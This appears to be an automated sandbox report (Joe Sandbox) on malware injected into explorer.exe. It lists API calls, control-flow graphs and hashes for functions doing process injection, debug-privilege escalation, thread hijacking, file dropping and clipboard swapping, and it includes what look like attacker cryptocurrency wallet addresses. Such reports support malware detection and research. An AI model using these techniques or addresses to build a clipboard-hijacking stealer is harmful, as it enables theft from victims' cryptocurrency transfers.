                                                                                                                                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptySleep
                                                                                                                                                                  • String ID: 0xe082eae973143a32d82db061b6c8885ceba72b87$1BZS1JgAFe13aBqMdLZS2eN31NtpYQA6y6$DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5$LNYd8g8WfirJtTvQuhrEZ5BD9hua18kaVK$TMjbm61ctPtZqDVxeZHgXRw4Tq8gzZo9Jq$XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH$addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0$bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze$rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv
                                                                                                                                                                  • API String ID: 2992153386-2300265441
                                                                                                                                                                  • Opcode ID: ef6a4bfc034eb6a153bef323cbf05477a6a9cfc505bd8e7af2e175d1072a2601
                                                                                                                                                                  • Instruction ID: 451d83e019221b4b92beee27a868f2fb1adc4915293cf33e0df1d20f7fa6d651
                                                                                                                                                                  • Opcode Fuzzy Hash: ef6a4bfc034eb6a153bef323cbf05477a6a9cfc505bd8e7af2e175d1072a2601
                                                                                                                                                                  • Instruction Fuzzy Hash: 8CD12AA1710A46A5EF00EFB9D4543DC6362E755BCCFC0E51A9A0DDBB58EF24C249C391

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 826 98350d0-983514a lstrcpyA call 9829450 830 98351c7-98351db free call 9860868 SleepEx 826->830 831 983514c-983515e call 98607f0 826->831 836 9835170-9835197 StrChrA call 98607f8 831->836 837 9835160-9835165 call 9835570 831->837 842 98351a0-98351a3 836->842 843 9835199-983519c 836->843 837->830 844 98351c2-98351c5 842->844 845 98351a5-98351bd call 9860808 call 9835450 842->845 843->842 844->830 844->836 845->844
                                                                                                                                                                  APIs
                                                                                                                                                                  • lstrcpyA.KERNEL32 ref: 0983512F
                                                                                                                                                                    • Part of subcall function 09829450: EnterCriticalSection.KERNEL32 ref: 09829498
                                                                                                                                                                    • Part of subcall function 09829450: RtlInitializeCriticalSection.NTDLL ref: 098294A5
                                                                                                                                                                    • Part of subcall function 09829450: lstrcpyA.KERNEL32 ref: 098294DA
                                                                                                                                                                    • Part of subcall function 09829450: lstrcpyA.KERNEL32 ref: 098294FD
                                                                                                                                                                    • Part of subcall function 09829450: lstrcatA.KERNEL32 ref: 0982950D
                                                                                                                                                                    • Part of subcall function 09829450: lstrcatA.KERNEL32 ref: 0982951D
                                                                                                                                                                    • Part of subcall function 09829450: LeaveCriticalSection.KERNEL32 ref: 098295A4
                                                                                                                                                                    • Part of subcall function 09829450: memcpy.MSVCRT ref: 098295BC
                                                                                                                                                                    • Part of subcall function 09829450: lstrlenA.KERNEL32 ref: 098295CA
                                                                                                                                                                  • lstrcmp.KERNEL32 ref: 09835156
                                                                                                                                                                  • free.MSVCRT ref: 098351CA
                                                                                                                                                                  • Sleep.KERNEL32 ref: 098351D5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSectionlstrcpy$lstrcat$EnterInitializeLeaveSleepfreelstrcmplstrlenmemcpy
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4292776791-0
                                                                                                                                                                  • Opcode ID: 96e53470d1276391f0d3e9ebc9b3fe0843cd8b69290cef162e5c6cd72c2f1f32
                                                                                                                                                                  • Instruction ID: 9d1ad0410873180ea309083ade39250127013dee7d0f6a20fb5f40cd36539e4f
                                                                                                                                                                  • Opcode Fuzzy Hash: 96e53470d1276391f0d3e9ebc9b3fe0843cd8b69290cef162e5c6cd72c2f1f32
                                                                                                                                                                  • Instruction Fuzzy Hash: 9A219435219B41C5EB14DF16A85435EB7A5FB99B84F84D028EA8E87B15EF3CC104CB84

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                  • String ID: %08lX%04lX%lu$:
                                                                                                                                                                  • API String ID: 3001812590-1109288774
                                                                                                                                                                  • Opcode ID: 6bb8f0452dc48ed42a104bb424a482e778bff8d2b367419224321099e76585b0
                                                                                                                                                                  • Instruction ID: d5f08cdb818e6066c8afc78d1d989ce46204c627231a11b34392d58afb6d1909
                                                                                                                                                                  • Opcode Fuzzy Hash: 6bb8f0452dc48ed42a104bb424a482e778bff8d2b367419224321099e76585b0
                                                                                                                                                                  • Instruction Fuzzy Hash: 9D311A36218A80D6D710CFA5E85035AB7B0F799744F91541AEB8DC3B28EB7DC544CF00

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                  • String ID: %08lX%04lX%lu$:\
                                                                                                                                                                  • API String ID: 3001812590-790759568
                                                                                                                                                                  • Opcode ID: f49aab7a8f087b4db7fdd291aae639e20113c460a4db87b972b1626037c6f69d
                                                                                                                                                                  • Instruction ID: 37a31e3bf2f1351b99af7d038d4b382c16281566c141dc244f5aed2bd6d1553a
                                                                                                                                                                  • Opcode Fuzzy Hash: f49aab7a8f087b4db7fdd291aae639e20113c460a4db87b972b1626037c6f69d
                                                                                                                                                                  • Instruction Fuzzy Hash: E3311C36218B80DAD710CF69E45034ABBB1F79A754F95551AEBC983B29DB3CC549CB00

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 914 9828fe0-9828fed 915 982904f-9829054 914->915 916 9828fef-9828ff9 914->916 917 9828ffb 916->917 918 9829038-982904a HeapFree 916->918 919 9829000-9829018 OpenThread 917->919 918->915 920 982901a-9829026 ResumeThread call 9850040 919->920 921 982902c-9829031 919->921 920->921 921->919 922 9829033 921->922 922->918
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Thread$CloseFreeHandleHeapOpenResume
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 993137029-0
                                                                                                                                                                  • Opcode ID: 350b1093ccfd2c3c2c73eb94d1ee066efdd318783ec75fd0ecdc008773dfeb84
                                                                                                                                                                  • Instruction ID: 1e8f34a539891c18350d43e69fcbafec759b5565d4a2da9e22ee00e29494fb33
                                                                                                                                                                  • Opcode Fuzzy Hash: 350b1093ccfd2c3c2c73eb94d1ee066efdd318783ec75fd0ecdc008773dfeb84
                                                                                                                                                                  • Instruction Fuzzy Hash: 29018C36615A9482EB04CF62E99431D7361FB8AFC4F09D029DB0A87B15CF3AC0A6CB04

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 924 983b3c0-983b3dc CreateMutexA 925 983b3ee-983b3f9 call 9850048 924->925 926 983b3de-983b3e0 call 9850040 924->926 929 983b3e6-983b3ed 925->929 931 983b3fb-983b40b call 9850040 925->931 926->929
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2372642624-0
                                                                                                                                                                  • Opcode ID: 58190a93ded2dde5e8871cad741f0538f53c091da1e701dab678116d39fd0d8f
                                                                                                                                                                  • Instruction ID: 08d9da7ff60fcb679923da75814e35c2605c94f50e77975073c8e1b66459516f
                                                                                                                                                                  • Opcode Fuzzy Hash: 58190a93ded2dde5e8871cad741f0538f53c091da1e701dab678116d39fd0d8f
                                                                                                                                                                  • Instruction Fuzzy Hash: 2EE086A5601B0083EF291B71688637A1350AB5E701F85982DC80EC9342EE3C81DD8304
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ProtectVirtual$CacheFlushInstruction
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 882653843-0
                                                                                                                                                                  • Opcode ID: 75f636435a0f4809db09609f496f6760a96ec8b1148eb731a98781e445c4eafc
                                                                                                                                                                  • Instruction ID: 7f087a7485e1b71f325fd778ad415d4b1122a85bdfb86a089daece91274dd4ed
                                                                                                                                                                  • Opcode Fuzzy Hash: 75f636435a0f4809db09609f496f6760a96ec8b1148eb731a98781e445c4eafc
                                                                                                                                                                  • Instruction Fuzzy Hash: 0031E1672086D08ADB11CF36E50036D7B60F31AF88F09821AEF898B79ACF2CD495C755
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 098351E0: lstrlenA.KERNEL32 ref: 09835282
                                                                                                                                                                    • Part of subcall function 098351E0: InternetCrackUrlA.WININET ref: 09835297
                                                                                                                                                                    • Part of subcall function 098351E0: PathFindFileNameW.SHLWAPI ref: 0983531C
                                                                                                                                                                    • Part of subcall function 098351E0: GetTempPathW.KERNEL32 ref: 09835336
                                                                                                                                                                    • Part of subcall function 098351E0: GetTempFileNameW.KERNEL32 ref: 0983534C
                                                                                                                                                                    • Part of subcall function 098351E0: lstrcatW.KERNEL32 ref: 0983535C
                                                                                                                                                                    • Part of subcall function 098351E0: lstrcatW.KERNEL32 ref: 09835368
                                                                                                                                                                    • Part of subcall function 098351E0: CreateFileW.KERNEL32 ref: 09835391
                                                                                                                                                                    • Part of subcall function 0982F170: SHGetFolderPathW.SHELL32 ref: 0982F1D5
                                                                                                                                                                    • Part of subcall function 0982F170: lstrcatW.KERNEL32 ref: 0982F1E5
                                                                                                                                                                    • Part of subcall function 0982F170: lstrcatW.KERNEL32 ref: 0982F1F3
                                                                                                                                                                    • Part of subcall function 0982F170: CreateDirectoryW.KERNEL32 ref: 0982F1FE
                                                                                                                                                                    • Part of subcall function 0982F170: SetFileAttributesW.KERNEL32 ref: 0982F20C
                                                                                                                                                                    • Part of subcall function 0982F170: lstrcatW.KERNEL32 ref: 0982F21C
                                                                                                                                                                    • Part of subcall function 0982F170: lstrcatW.KERNEL32 ref: 0982F22A
                                                                                                                                                                    • Part of subcall function 0982F170: lstrcatW.KERNEL32 ref: 0982F23A
                                                                                                                                                                  • DeleteFileW.KERNEL32 ref: 098354E5
                                                                                                                                                                  • CopyFileW.KERNEL32 ref: 098354FB
                                                                                                                                                                  • SetFileAttributesW.KERNEL32 ref: 0983550C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Filelstrcat$Path$AttributesCreateNameTemp$CopyCrackDeleteDirectoryFindFolderInternetlstrlen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3447680573-0
                                                                                                                                                                  • Opcode ID: 7f49b66afa7c0b190dc72cc57ffd92d7ba36ceae248c7b52d8005671203e4e27
                                                                                                                                                                  • Instruction ID: 56e869f57f9d7b700425cbdf3880e64a0061f3b857b3637bf88c77ef56ca2710
                                                                                                                                                                  • Opcode Fuzzy Hash: 7f49b66afa7c0b190dc72cc57ffd92d7ba36ceae248c7b52d8005671203e4e27
                                                                                                                                                                  • Instruction Fuzzy Hash: FB217122324AC592DB30DF25E9A436BA321FB89788FC1D015D64D87A49EF2CC209CB45
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 098288B0: GetCurrentProcessId.KERNEL32 ref: 0982890B
                                                                                                                                                                    • Part of subcall function 098288B0: GetCurrentThreadId.KERNEL32 ref: 09828917
                                                                                                                                                                    • Part of subcall function 098288B0: HeapAlloc.KERNEL32 ref: 09828941
                                                                                                                                                                    • Part of subcall function 098288B0: Thread32Next.KERNEL32 ref: 098289A0
                                                                                                                                                                    • Part of subcall function 098288B0: CloseHandle.KERNEL32 ref: 098289B0
                                                                                                                                                                  • OpenThread.KERNEL32 ref: 09828AEE
                                                                                                                                                                  • SuspendThread.KERNEL32 ref: 09828AFF
                                                                                                                                                                    • Part of subcall function 09828EA0: GetThreadContext.KERNEL32 ref: 09828ED4
                                                                                                                                                                    • Part of subcall function 09828EA0: SetThreadContext.KERNEL32 ref: 09828F94
                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 09828B16
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Thread$CloseContextCurrentHandle$AllocHeapNextOpenProcessSuspendThread32
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4205413918-0
                                                                                                                                                                  • Opcode ID: fb0b88b831a84adbd08517c03dc5737f98b5e285529bda5c5170a0eb1dd0c5da
                                                                                                                                                                  • Instruction ID: dd366f3d53346c5f24992c3dde4cded373489e797029e1004e253884571dfc7e
                                                                                                                                                                  • Opcode Fuzzy Hash: fb0b88b831a84adbd08517c03dc5737f98b5e285529bda5c5170a0eb1dd0c5da
                                                                                                                                                                  • Instruction Fuzzy Hash: 01016136205B9487DB14DF16A48061EB760F789F80F489029EF4A83B18CF38D0A1CB04
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 09828860: Sleep.KERNEL32 ref: 0982888C
                                                                                                                                                                  • HeapCreate.KERNEL32 ref: 09828DCD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateHeapSleep
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 221814145-0
                                                                                                                                                                  • Opcode ID: 2566898438aa13b641ec1c9a74339e6218832f4f3109a69167c1f6b2db446f76
                                                                                                                                                                  • Instruction ID: 57eee8e8ca34ff3005e6cdcdae47f0748de75b7d75b6b103036658c4af963830
                                                                                                                                                                  • Opcode Fuzzy Hash: 2566898438aa13b641ec1c9a74339e6218832f4f3109a69167c1f6b2db446f76
                                                                                                                                                                  • Instruction Fuzzy Hash: 84E0DF50B0272043FF69BFBA58E23291140DF1A310F4CA43CDE08C9782EE2C98EB5766
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileProcess$CreateMemoryWrite$AllocCloseContextHandleReadSizeThreadVirtualmalloc
                                                                                                                                                                  • String ID: @
                                                                                                                                                                  • API String ID: 596952117-2766056989
                                                                                                                                                                  • Opcode ID: 4fee09da6d689d869712edbc9f3647fd5830afbe0c47d0c9cd235d62fc0a3f09
                                                                                                                                                                  • Instruction ID: 1eb945f0753d66514a69a1e15bb2cd7d2d59bef93375b00327f054e41069efb5
                                                                                                                                                                  • Opcode Fuzzy Hash: 4fee09da6d689d869712edbc9f3647fd5830afbe0c47d0c9cd235d62fc0a3f09
                                                                                                                                                                  • Instruction Fuzzy Hash: 9B814976704F908AEB60CF66E84479EB7A5F789B98F514119EE8D87B18DF38C059CB00
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Handle$Close$Process$AddressAllocCreateMemoryModuleOpenProcRemoteThreadVirtualWrite
                                                                                                                                                                  • String ID: @$LoadLibraryA$kernel32.dll
                                                                                                                                                                  • API String ID: 752146563-1829755052
                                                                                                                                                                  • Opcode ID: aceee3e72daa409afe0c74074086a186fcbb32be1051051977a91a2bbe77d00d
                                                                                                                                                                  • Instruction ID: 8144cae2ae4e64a96cd2aa56471151ae246e7683adeeb904a5b267b9cbfc4eaf
                                                                                                                                                                  • Opcode Fuzzy Hash: aceee3e72daa409afe0c74074086a186fcbb32be1051051977a91a2bbe77d00d
                                                                                                                                                                  • Instruction Fuzzy Hash: 88318121305F5082EB149F16B82435A63A4FB8AFC1F54802AEE4E87B65DF3CC149CB00
                                                                                                                                                                  APIs
                                                                                                                                                                  • malloc.LIBCMT ref: 03320C78
                                                                                                                                                                    • Part of subcall function 0333CB0C: _FF_MSGBANNER.LIBCMT ref: 0333CB3C
                                                                                                                                                                    • Part of subcall function 0333CB0C: _NMSG_WRITE.LIBCMT ref: 0333CB46
                                                                                                                                                                    • Part of subcall function 0333CB0C: _callnewh.LIBCMT ref: 0333CB7A
                                                                                                                                                                    • Part of subcall function 0333CB0C: _errno.LIBCMT ref: 0333CB85
                                                                                                                                                                    • Part of subcall function 0333CB0C: _errno.LIBCMT ref: 0333CB90
                                                                                                                                                                  • free.LIBCMT ref: 03321020
                                                                                                                                                                  • free.LIBCMT ref: 03321028
                                                                                                                                                                    • Part of subcall function 0333CACC: _errno.LIBCMT ref: 0333CAEC
                                                                                                                                                                  • free.LIBCMT ref: 03321030
                                                                                                                                                                  • free.LIBCMT ref: 03321039
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3320000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: free$_errno$_callnewhmalloc
                                                                                                                                                                  • String ID: GetFileVersionInfoSizeA$Process32Next$StrChrA$VerQueryValueA$_errno$eCriticalSection$ersionInfoA$isdigit$isxdigit$olhelp32Snapshot
                                                                                                                                                                  • API String ID: 2761444284-1026861232
                                                                                                                                                                  • Opcode ID: 36c077ed5355f3fc8295b3ec08d29b47507b78eb77a2b19de5eeb13cea3bbcee
                                                                                                                                                                  • Instruction ID: d6f3c98c57a9a3c7f6d1bd70eb1e2a46c6602ecef8debdc210d58ce8e094e946
                                                                                                                                                                  • Opcode Fuzzy Hash: 36c077ed5355f3fc8295b3ec08d29b47507b78eb77a2b19de5eeb13cea3bbcee
                                                                                                                                                                  • Instruction Fuzzy Hash: CFC16F36604B9586EB15DF26FC9439A77A4F789B88F484115DE4A47B28DF3CE349CB00
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 098232C6
                                                                                                                                                                  • OpenProcessToken.ADVAPI32 ref: 098232D9
                                                                                                                                                                  • LookupPrivilegeValueA.ADVAPI32 ref: 098232FD
                                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 09823320
                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 0982332B
                                                                                                                                                                  • OpenProcess.KERNEL32 ref: 0982333B
                                                                                                                                                                    • Part of subcall function 09823070: OpenProcess.KERNEL32 ref: 09823099
                                                                                                                                                                    • Part of subcall function 09823070: CloseHandle.KERNEL32 ref: 098230C1
                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 09823378
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$CloseHandleOpen$Token$AdjustCurrentLookupPrivilegePrivilegesValue
                                                                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                                                                  • API String ID: 2357999848-2896544425
                                                                                                                                                                  • Opcode ID: 66fffd2de0935a74dfcb0fab2122081d9215bb3b55ed28a7a9a6bcfc679ed4e5
                                                                                                                                                                  • Instruction ID: 36be710437d2135738c7d0a091930d582e922b4aa5c359fa39abf7e42208aa19
                                                                                                                                                                  • Opcode Fuzzy Hash: 66fffd2de0935a74dfcb0fab2122081d9215bb3b55ed28a7a9a6bcfc679ed4e5
                                                                                                                                                                  • Instruction Fuzzy Hash: 5C31A221314B5183EB148F26B86471AA7A1FB8AFD4F51902DEE4ED7B65EF3CC5498700
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlock
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1677084743-0
                                                                                                                                                                  • Opcode ID: bf640c0bf7507bf40261c2d8693ea0401631c1f941285e11bd04364b3ff0d746
                                                                                                                                                                  • Instruction ID: 5116847db3d1320e00f1b980e65c01b81476540d1d1ef2864db02ff3360cb182
                                                                                                                                                                  • Opcode Fuzzy Hash: bf640c0bf7507bf40261c2d8693ea0401631c1f941285e11bd04364b3ff0d746
                                                                                                                                                                  • Instruction Fuzzy Hash: 23012C21609B5186EB04AF66B8183597361F74AFC0F449125DE4B4BB56CF3DD485C780
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Virtual$AllocCreateMemoryProcessProtectRemoteThreadWrite
                                                                                                                                                                  • String ID: @
                                                                                                                                                                  • API String ID: 1113946311-2766056989
                                                                                                                                                                  • Opcode ID: bb99e5549d4c44404210e3d2a102585b48636c082e0f941570c191f9acfe0ba0
                                                                                                                                                                  • Instruction ID: 259bb61d8c83b7b9197a65fbe984e67462aabb515232cf762b63dce5edbc339c
                                                                                                                                                                  • Opcode Fuzzy Hash: bb99e5549d4c44404210e3d2a102585b48636c082e0f941570c191f9acfe0ba0
                                                                                                                                                                  • Instruction Fuzzy Hash: 28217172305B9182DB25CF67B944B2AB6A5F749BC0F458129EE8D93B18DF3DC0458B00
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1006321803-0
                                                                                                                                                                  • Opcode ID: ee642c975acfce22a74874630e39c61d92233d1f2da0fd13e9adb5dd35efcfc7
                                                                                                                                                                  • Instruction ID: b9ecde48dc4c2bedef0eedd16ea60ab32405b2feaac2ac12385f6d8d34d7ecae
                                                                                                                                                                  • Opcode Fuzzy Hash: ee642c975acfce22a74874630e39c61d92233d1f2da0fd13e9adb5dd35efcfc7
                                                                                                                                                                  • Instruction Fuzzy Hash: 1B016262718B4182EE099F16B9883296361AB49FC0F48E139EE1F4B759DF3CD196C740
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 524efeb79b42dd35c7640904553f5aa16a952790f49f4c8bf7545cbca815e198
                                                                                                                                                                  • Instruction ID: 130ae406d6412bb1ba65ba1aebe94fcb09a98b242f7ce3c534f8e11ba3cc339f
                                                                                                                                                                  • Opcode Fuzzy Hash: 524efeb79b42dd35c7640904553f5aa16a952790f49f4c8bf7545cbca815e198
                                                                                                                                                                  • Instruction Fuzzy Hash: A5A022C2820B00C2E282000A0B883E20F828F23BBAE0C032C0C38C22E00B2B28030008
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                  • Instruction ID: 33f440db8dcf76ed1806d7bd443262935e64228566635c654bb1f16f699d93a5
                                                                                                                                                                  • Opcode Fuzzy Hash: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpy$malloc$realloc$free$CriticalSectionlstrlen$EnterLeavewsprintf
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 812771569-0
                                                                                                                                                                  • Opcode ID: 63243f6790e5d17214911157205b1940921de3069c4743449ec7b7d160343d5d
